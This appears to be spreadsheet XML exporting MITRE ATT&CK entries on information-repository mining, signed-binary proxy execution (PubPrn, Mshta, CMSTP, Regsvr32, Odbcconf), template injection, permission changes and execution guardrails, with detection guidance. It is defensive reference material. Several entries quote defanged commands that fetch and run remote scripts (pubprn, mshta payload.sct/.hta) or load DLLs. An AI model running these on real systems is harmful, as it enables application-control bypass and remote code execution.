  <si>
    <t>Data from Information Repositories</t>
  </si>
  <si>
    <t>OAuth audit logs,Application logs,Authentication logs,Data loss prevention,Third-party application logs</t>
  </si>
  <si>
    <t>Linux,Windows,macOS,SaaS,Office 365</t>
  </si>
  <si>
    <t>As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should not generally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The user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging) The user access logging within Atlassian's Confluence can also be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.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</si>
  <si>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Information stored in a repository may vary based on the specific instance or environment. Specific common information repositories include [Sharepoint](https://attack.mitre.org/techniques/T1213/002), [Confluence](https://attack.mitre.org/techniques/T1213/001), and enterprise databases such as SQL Server.</t>
  </si>
  <si>
    <t>T1213.001</t>
  </si>
  <si>
    <t>Confluence</t>
  </si>
  <si>
    <t>Third-party application logs,Authentication logs</t>
  </si>
  <si>
    <t>SaaS</t>
  </si>
  <si>
    <t>Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should not generally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User access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.</t>
  </si>
  <si>
    <t xml:space="preserve">
Adversaries may leverage Confluence repositories to mine valuable information. Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation, however, in general may contain more diverse categories of useful information, such as:
* Policies, procedures, and standards
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
* Testing / development credentials
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
</t>
  </si>
  <si>
    <t>T1213.002</t>
  </si>
  <si>
    <t>Sharepoint</t>
  </si>
  <si>
    <t>Office 365 audit logs,Authentication logs,Application logs</t>
  </si>
  <si>
    <t xml:space="preserve">The user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging). As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should not generally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t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:
* Policies, procedures, and standards
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
* Testing / development credentials
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
</t>
  </si>
  <si>
    <t>Signed Script Proxy Execution</t>
  </si>
  <si>
    <t>Monitor script processes, such as `cscript`, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.</t>
  </si>
  <si>
    <t>Adversaries may use scripts signed with trusted certificates to proxy execution of malicious files. Several Microsoft signed scripts that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.(Citation: GitHub Ultimate AppLocker Bypass List)</t>
  </si>
  <si>
    <t>Application control,Digital Certificate Validation</t>
  </si>
  <si>
    <t>T1216.001</t>
  </si>
  <si>
    <t>PubPrn</t>
  </si>
  <si>
    <t>Adversaries may use the trusted PubPrn script to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application control solutions that do not account for use of these scripts.
&lt;code&gt;PubPrn.vbs&lt;/code&gt; is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script is signed by Microsoft and can be used to proxy execution from a remote site.(Citation: Enigma0x3 PubPrn Bypass) An example command is &lt;code&gt;cscript C[:]\Windows\System32\Printing_Admin_Scripts\en-US\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Browser Bookmark Discovery</t>
  </si>
  <si>
    <t>API monitoring,File monitoring,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions that could be taken to gather browser bookmark information. Remote access tools with built-in features may interact directly using APIs to gather information. Information may also be acquired through system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
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t>
  </si>
  <si>
    <t>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
Browser bookmarks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bookmarks are typically stored in local files/databases.</t>
  </si>
  <si>
    <t>Signed Binary Proxy Execution</t>
  </si>
  <si>
    <t>API monitoring,File monitoring,Binary file metadata,Process use of network,Windows Registry,Loaded DLLs,DLL monitoring,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Monitor processes and command-line parameters for signed binaries that may be used to proxy execution of malicious files. Compare recent invocations of signed binaries that may be used to proxy execution with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Legitimate programs used in suspicious ways, like msiexec.exe downloading an MSI file from the Internet, may be indicative of an intrusion. Correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.
Monitor for file activity (creations, downloads, modifications, etc.), especially for file types that are not typical within an environment and may be indicative of adversary activity.</t>
  </si>
  <si>
    <t>Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed binaries. Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files.</t>
  </si>
  <si>
    <t>Anti-virus,Application control,Digital Certificate Validation</t>
  </si>
  <si>
    <t>T1218.001</t>
  </si>
  <si>
    <t>Compiled HTML File</t>
  </si>
  <si>
    <t>Monitor and analyze the execution and arguments of hh.exe. (Citation: MsitPros CHM Aug 2017) Compare recent invocations of hh.exe with prior history of known good arguments to determine anomalous and potentially adversarial activity (ex: obfuscated and/or malicious commands). Non-standard process execution trees may also indicate suspicious or malicious behavior, such as if hh.exe is the parent process for suspicious processes and activity relating to other adversarial techniques.
Monitor presence and use of CHM files, especially if they are not typically used within an environment.</t>
  </si>
  <si>
    <t>Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files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 custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://attack.mitre.org/techniques/T1204). CHM execution may also bypass application application control on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)</t>
  </si>
  <si>
    <t>Digital Certificate Validation,Application control</t>
  </si>
  <si>
    <t>T1218.002</t>
  </si>
  <si>
    <t>Control Panel</t>
  </si>
  <si>
    <t>Process monitoring,Process command-line parameters,Windows Registry,DLL monitoring,Binary file metadata,API monitoring</t>
  </si>
  <si>
    <t>Monitor and analyze activity related to items associated with CPL files, such as the control.exe and the &lt;code&gt;Control_RunDLL&lt;/code&gt; and &lt;code&gt;ControlRunDLLAsUser&lt;/code&gt; API functions in shell32.dll. When executed from the command line or clicked, control.exe will execute the CPL file (ex: &lt;code&gt;control.exe file.cpl&lt;/code&gt;) before [Rundll32](https://attack.mitre.org/techniques/T1218/011) is used to call the CPL's API functions (ex: &lt;code&gt;rundll32.exe shell32.dll,Control_RunDLL file.cpl&lt;/code&gt;). CPL files can be executed directly via the CPL API function with just the latter [Rundll32](https://attack.mitre.org/techniques/T1218/011) command, which may bypass detections and/or execution filters for control.exe.(Citation: TrendMicro CPL Malware Jan 2014)
Inventory Control Panel items to locate unregistered and potentially malicious files present on systems:
* Executable format registered Control Panel items will have a globally unique identifier (GUID) and registration Registry entries in &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace&lt;/code&gt; and &lt;code&gt;HKEY_CLASSES_ROOT\CLSID\{GUID}&lt;/code&gt;. These entries may contain information about the Control Panel item such as its display name, path to the local file, and the command executed when opened in the Control Panel. (Citation: Microsoft Implementing CPL)
* CPL format registered Control Panel items stored in the System32 directory are automatically shown in the Control Panel. Other Control Panel items will have registration entries in the &lt;code&gt;CPLs&lt;/code&gt; and &lt;code&gt;Extended Properties&lt;/code&gt; Registry keys of &lt;code&gt;HKEY_LOCAL_MACHINE or HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Control Panel&lt;/code&gt;. These entries may include information such as a GUID, path to the local file, and a canonical name used to launch the file programmatically (&lt;code&gt; WinExec("c:\windows\system32\control.exe {Canonical_Name}", SW_NORMAL);&lt;/code&gt;) or from a command line (&lt;code&gt;control.exe /name {Canonical_Name}&lt;/code&gt;).(Citation: Microsoft Implementing CPL)
* Some Control Panel items are extensible via Shell extensions registered in &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Controls Folder\{name}\Shellex\PropertySheetHandlers&lt;/code&gt; where {name} is the predefined name of the system item.(Citation: Microsoft Implementing CPL)
Analyze new Control Panel items as well as those present on disk for malicious content. Both executable and CPL formats are compliant Portable Executable (PE) images and can be examined using traditional tools and methods, pending anti-reverse-engineering techniques.(Citation: TrendMicro CPL Malware Jan 2014)</t>
  </si>
  <si>
    <t>Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.
Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a &lt;code&gt;CPlApplet&lt;/code&gt; function.(Citation: Microsoft Implementing CPL)(Citation: TrendMicro CPL Malware Jan 2014) For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel.(Citation: Microsoft Implementing CPL) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.(Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013)
Malicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns(Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware.(Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.
Adversaries may also rename malicious DLL files (.dll) with Control Panel file extensions (.cpl) and register them to &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls&lt;/code&gt;. Even when these registered DLLs do not comply with the CPL file specification and do not export &lt;code&gt;CPlApplet&lt;/code&gt; functions, they are loaded and executed through its &lt;code&gt;DllEntryPoint&lt;/code&gt; when Control Panel is executed. CPL files not exporting &lt;code&gt;CPlApplet&lt;/code&gt; are not directly executable.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>T1218.003</t>
  </si>
  <si>
    <t>CMSTP</t>
  </si>
  <si>
    <t>Windows event logs,Process use of network,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Use process monitoring to detect and analyze the execution and arguments of CMSTP.exe. Compare recent invocations of CMSTP.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity.
Sysmon events can also be used to identify potential abuses of CMSTP.exe. Detection strategy may depend on the specific adversary procedure, but potential rules include: (Citation: Endurant CMSTP July 2018)
* To detect loading and execution of local/remote payloads - Event 1 (Process creation) where ParentImage contains CMSTP.exe and/or Event 3 (Network connection) where Image contains CMSTP.exe and DestinationIP is external.
* To detect [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) via an auto-elevated COM interface - Event 10 (ProcessAccess) where CallTrace contains CMLUA.dll and/or Event 12 or 13 (RegistryEvent) where TargetObject contains CMMGR32.exe. Also monitor for events, such as the creation of processes (Sysmon Event 1), that involve auto-elevated CMSTP COM interfaces such as CMSTPLUA (3E5FC7F9-9A51-4367-9063-A120244FBEC7) and CMLUAUTIL (3E000D72-A845-4CD9-BD83-80C07C3B881F).</t>
  </si>
  <si>
    <t>Adversaries may abuse CMSTP to proxy execution of malicious code. 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[Regsvr32](https://attack.mitre.org/techniques/T1218/010)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application control defenses since CMSTP.exe is a legitimate, signed Microsoft application.
CMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)</t>
  </si>
  <si>
    <t>T1218.004</t>
  </si>
  <si>
    <t>InstallUtil</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of InstallUtil.exe. Compare recent invocations of InstallUtil.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after the InstallUtil.exe invocation may also be useful in determining the origin and purpose of the binary being executed.</t>
  </si>
  <si>
    <t>Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) InstallUtil is digitally signed by Microsoft and located in the .NET directories on a Windows system: &lt;code&gt;C:\Windows\Microsoft.NET\Framework\v&lt;version&gt;\InstallUtil.exe&lt;/code&gt; and &lt;code&gt;C:\Windows\Microsoft.NET\Framework64\v&lt;version&gt;\InstallUtil.exe&lt;/code&gt;.
InstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute &lt;code&gt;[System.ComponentModel.RunInstaller(true)]&lt;/code&gt;. (Citation: LOLBAS Installutil)</t>
  </si>
  <si>
    <t>T1218.005</t>
  </si>
  <si>
    <t>Mshta</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of mshta.exe. Look for mshta.exe executing raw or obfuscated script within the command-line. Compare recent invocations of mshta.exe with prior history of known good arguments and executed .hta files to determine anomalous and potentially adversarial activity. Command arguments used before and after the mshta.exe invocation may also be useful in determining the origin and purpose of the .hta file being executed.
Monitor use of HTA files. If they are not typically used within an environment then execution of them may be suspicious</t>
  </si>
  <si>
    <t>Adversaries may abuse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Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)
Files may be executed by mshta.exe through an inline script: &lt;code&gt;mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))&lt;/code&gt;
They may also be executed directly from URLs: &lt;code&gt;mshta http[:]//webserver/payload[.]hta&lt;/code&gt;
Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)</t>
  </si>
  <si>
    <t>T1218.007</t>
  </si>
  <si>
    <t>Msiexec</t>
  </si>
  <si>
    <t>DLL monitoring,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of msiexec.exe. Compare recent invocations of msiexec.exe with prior history of known good arguments and executed MSI files or DLLs to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of msiexec.exe may also be useful in determining the origin and purpose of the MSI files or DLLs being executed.</t>
  </si>
  <si>
    <t>Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) Msiexec.exe is digitally signed by Microsoft.
Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it is signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse.</t>
  </si>
  <si>
    <t>T1218.008</t>
  </si>
  <si>
    <t>Odbcconf</t>
  </si>
  <si>
    <t>Loaded DLLs,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of odbcconf.exe. Compare recent invocations of odbcconf.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of odbcconf.exe may also be useful in determining the origin and purpose of the DLL being loaded.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) Odbcconf.exe is digitally signed by Microsoft.
Adversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010), odbcconf.exe has a &lt;code&gt;REGSVR&lt;/code&gt; flag that can be misused to execute DLLs (ex: &lt;code&gt;odbcconf.exe /S /A &amp;lbrace;REGSVR "C:\Users\Public\file.dll"&amp;rbrace;&lt;/code&gt;). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017) 
</t>
  </si>
  <si>
    <t>T1218.009</t>
  </si>
  <si>
    <t>Regsvcs/Regasm</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of Regsvcs.exe and Regasm.exe. Compare recent invocations of Regsvcs.exe and Regasm.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after Regsvcs.exe or Regasm.exe invocation may also be useful in determining the origin and purpose of the binary being executed.</t>
  </si>
  <si>
    <t>Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)
Both utilities may be used to bypass application control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LOLBAS Regsvcs)(Citation: LOLBAS Regasm)</t>
  </si>
  <si>
    <t>T1218.010</t>
  </si>
  <si>
    <t>Regsvr32</t>
  </si>
  <si>
    <t>Windows Registry,Process command-line parameters,Process monitoring,Loaded DLLs</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of regsvr32.exe. Compare recent invocations of regsvr32.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Command arguments used before and after the regsvr32.exe invocation may also be useful in determining the origin and purpose of the script or DLL being loaded. (Citation: Carbon Black Squiblydoo Apr 2016)</t>
  </si>
  <si>
    <t>Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary. (Citation: Microsoft Regsvr32)
Malicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control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LOLBAS Regsvr32) This variation of the technique is often referred to as a "Squiblydoo" attack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Hijacking](https://attack.mitre.org/techniques/T1546/015). (Citation: Carbon Black Squiblydoo Apr 2016)</t>
  </si>
  <si>
    <t>Digital Certificate Validation,Anti-virus,Application control</t>
  </si>
  <si>
    <t>T1218.011</t>
  </si>
  <si>
    <t>Rundll32</t>
  </si>
  <si>
    <t>DLL monitoring,Loaded DLLs,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded.</t>
  </si>
  <si>
    <t>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 (Citation: Trend Micro CPL)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t>
  </si>
  <si>
    <t>Digital Certificate Validation,Application control,Anti-virus</t>
  </si>
  <si>
    <t>T1218.012</t>
  </si>
  <si>
    <t>Verclsid</t>
  </si>
  <si>
    <t>Process use of network,Process command-line parameters,Process monitoring,File monitoring</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of verclsid.exe. Compare recent invocations of verclsid.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of verclsid.exe may also be useful in determining the origin and purpose of the payload being executed. Depending on the environment, it may be unusual for verclsid.exe to have a parent process of a Microsoft Office product. It may also be unusual for verclsid.exe to have any child processes or to make network connections or file modifications.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse verclsid.exe to proxy execution of malicious code. Verclsid.exe is known as the Extension CLSID Verification Host and is responsible for verifying each shell extension before they are used by Windows Explorer or the Windows Shell.(Citation: WinOSBite verclsid.exe)
Adversaries may abuse verclsid.exe to execute malicious payloads. This may be achieved by running &lt;code&gt;verclsid.exe /S /C {CLSID}&lt;/code&gt;, where the file is referenced by a Class ID (CLSID), a unique identification number used to identify COM objects. COM payloads executed by verclsid.exe may be able to perform various malicious actions, such as loading and executing COM scriptlets (SCT) from remote servers (similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010)). Since it is signed and native on Windows systems, proxying execution via verclsid.exe may bypass application control solutions that do not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation: Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation: Nick Tyrer GitHub) </t>
  </si>
  <si>
    <t>Remote Access Software</t>
  </si>
  <si>
    <t>Network intrusion detection system,Network protocol analysis,Process use of network,Process monitoring</t>
  </si>
  <si>
    <t>Monitor for applications and processes related to remote admin tools. Correlate activity with other suspicious behavior that may reduce false positives if these tools are used by legitimate users and administrators.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
[Domain Fronting](https://attack.mitre.org/techniques/T1090/004) may be used in conjunction to avoid defenses. Adversaries will likely need to deploy and/or install these remote tools to compromised systems. It may be possible to detect or prevent the installation of these tools with host-based solutions.</t>
  </si>
  <si>
    <t>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allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
Remote access tools may be established and used post-compromise as alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system.
Admin tools such as TeamViewer have been used by several groups targeting institutions in countries of interest to the Russian state and criminal campaigns. (Citation: CrowdStrike 2015 Global Threat Report) (Citation: CrySyS Blog TeamSpy)</t>
  </si>
  <si>
    <t>XSL Script Processing</t>
  </si>
  <si>
    <t>Process monitoring,Process command-line parameters,Process use of network,DLL monitoring</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of msxsl.exe and wmic.exe. Compare recent invocations of these utilities with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity (ex: URL command line arguments, creation of external network connections, loading of DLLs associated with scripting). (Citation: LOLBAS Wmic) (Citation: Twitter SquiblyTwo Detection APR 2018) Command arguments used before and after the script invocation may also be useful in determining the origin and purpose of the payload being loaded.
The presence of msxsl.exe or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.</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</si>
  <si>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control. Similar to [Trusted Developer Utilities Proxy Execution](https://attack.mitre.org/techniques/T1127),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[Regsvr32](https://attack.mitre.org/techniques/T1117)/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t>
  </si>
  <si>
    <t>Template Injection</t>
  </si>
  <si>
    <t>Anti-virus,Email gateway,Network intrusion detection system,Web logs</t>
  </si>
  <si>
    <t>Analyze process behavior to determine if an Office application is performing actions, such as opening network connections, reading files, spawning abnormal child processes (ex: [PowerShell](https://attack.mitre.org/techniques/T1059/001)), or other suspicious actions that could relate to post-compromise behavior.</t>
  </si>
  <si>
    <t>Adversaries may create or modify references in Office document templates to conceal malicious code or force authentication attempts.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 (Citation: Microsoft Open XML July 2017)
Properties within parts may reference shared public resources accessed via online URLs. For example, template properties reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded.
Adversaries may abuse this technology to initially conceal malicious code to be executed via documents. Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded. (Citation: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 (Citation: Redxorblue Remote Template Injection) Examples have been seen in the wild where template injection was used to load malicious code containing an exploit. (Citation: MalwareBytes Template Injection OCT 2017)
This technique may also enable [Forced Authentication](https://attack.mitre.org/techniques/T1187) by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt. (Citation: Anomali Template Injection MAR 2018) (Citation: Talos Template Injection July 2017) (Citation: ryhanson phishery SEPT 2016)</t>
  </si>
  <si>
    <t>Static File Analysis</t>
  </si>
  <si>
    <t>File and Directory Permissions Modification</t>
  </si>
  <si>
    <t>Monitor and investigate attempts to modify ACLs and file/directory ownership. Many of the commands used to modify ACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.
Consider enabling file/directory permission change auditing on folders containing key binary/configuration files. For example, Windows Security Log events (Event ID 4670) are created when DACLs are modified.(Citation: EventTracker File Permissions Feb 2014)</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</si>
  <si>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Modifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory’s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), [.bash_profile and .bashrc](https://attack.mitre.org/techniques/T1546/004), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).</t>
  </si>
  <si>
    <t>T1222.001</t>
  </si>
  <si>
    <t>Windows File and Directory Permissions Modification</t>
  </si>
  <si>
    <t>Windows event logs,Process command-line parameters,Process monitoring,File monitoring</t>
  </si>
  <si>
    <t>Monitor and investigate attempts to modify DACLs and file/directory ownership. Many of the commands used to modify DACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.
Consider enabling file/directory permission change auditing on folders containing key binary/configuration files. For example, Windows Security Log events (Event ID 4670) are created when DACLs are modified.(Citation: EventTracker File Permissions Feb 2014)</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</si>
  <si>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Windows implements file and directory ACLs as Discretionary Access Control Lists (DACLs).(Citation: Microsoft DACL May 2018) Similar to a standard ACL, DACLs identifies the accounts that are allowed or denied access to a securable object. When an attempt is made to access a securable object, the system checks the access control entries in the DACL in order. If a matching entry is found, access to the object is granted. Otherwise, access is denied.(Citation: Microsoft Access Control Lists May 2018)
Adversaries can interact with the DACLs using built-in Windows commands, such as `icacls`, `cacls`, `takeown`, and `attrib`, which can grant adversaries higher permissions on specific files and folders. Further, [PowerShell](https://attack.mitre.org/techniques/T1059/001) provides cmdlets that can be used to retrieve or modify file and directory DACLs. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).</t>
  </si>
  <si>
    <t>T1222.002</t>
  </si>
  <si>
    <t>Linux and Mac File and Directory Permissions Modification</t>
  </si>
  <si>
    <t>Monitor and investigate attempts to modify ACLs and file/directory ownership. Many of the commands used to modify ACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.
Consider enabling file/directory permission change auditing on folders containing key binary/configuration files.</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</si>
  <si>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Most Linux and Linux-based platforms provide a standard set of permission groups (user, group, and other) and a standard set of permissions (read, write, and execute) that are applied to each group. While nuances of each platform’s permissions implementation may vary, most of the platforms provide two primary commands used to manipulate file and directory ACLs: &lt;code&gt;chown&lt;/code&gt; (short for change owner), and &lt;code&gt;chmod&lt;/code&gt; (short for change mode).
Adversarial may use these commands to make themselves the owner of files and directories or change the mode if current permissions allow it. They could subsequently lock others out of the file. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [.bash_profile and .bashrc](https://attack.mitre.org/techniques/T1546/004) or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).</t>
  </si>
  <si>
    <t>Execution Guardrails</t>
  </si>
  <si>
    <t>Detecting the use of guardrails may be difficult depending on the implementation. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007), especially in a short period of time, may aid in detection.</t>
  </si>
  <si>
    <t>Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and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addresses.(Citation: FireEye Outlook Dec 2019)
Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails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guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.</t>
  </si>
  <si>
    <t>Anti-virus,Host forensic analysis,Signature-based detection,Static file analysis</t>
  </si>
  <si>
    <t>T1480.001</t>
  </si>
  <si>
    <t>Environmental Keying</t>
  </si>
  <si>
    <t>Detecting the use of environmental keying may be difficult depending on the implementation. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007), especially in a short period of time, may aid in detection.</t>
  </si>
  <si>
    <t>Adversaries may environmentally key payloads or other features of malware to evade defenses and constraint execution to a specific target environment. Environmental keying uses cryptography to constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target. Environmental keying is an implementation of [Execution Guardrails](https://attack.mitre.org/techniques/T1480) that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.(Citation: EK Clueless Agents)
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
Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection.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This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.
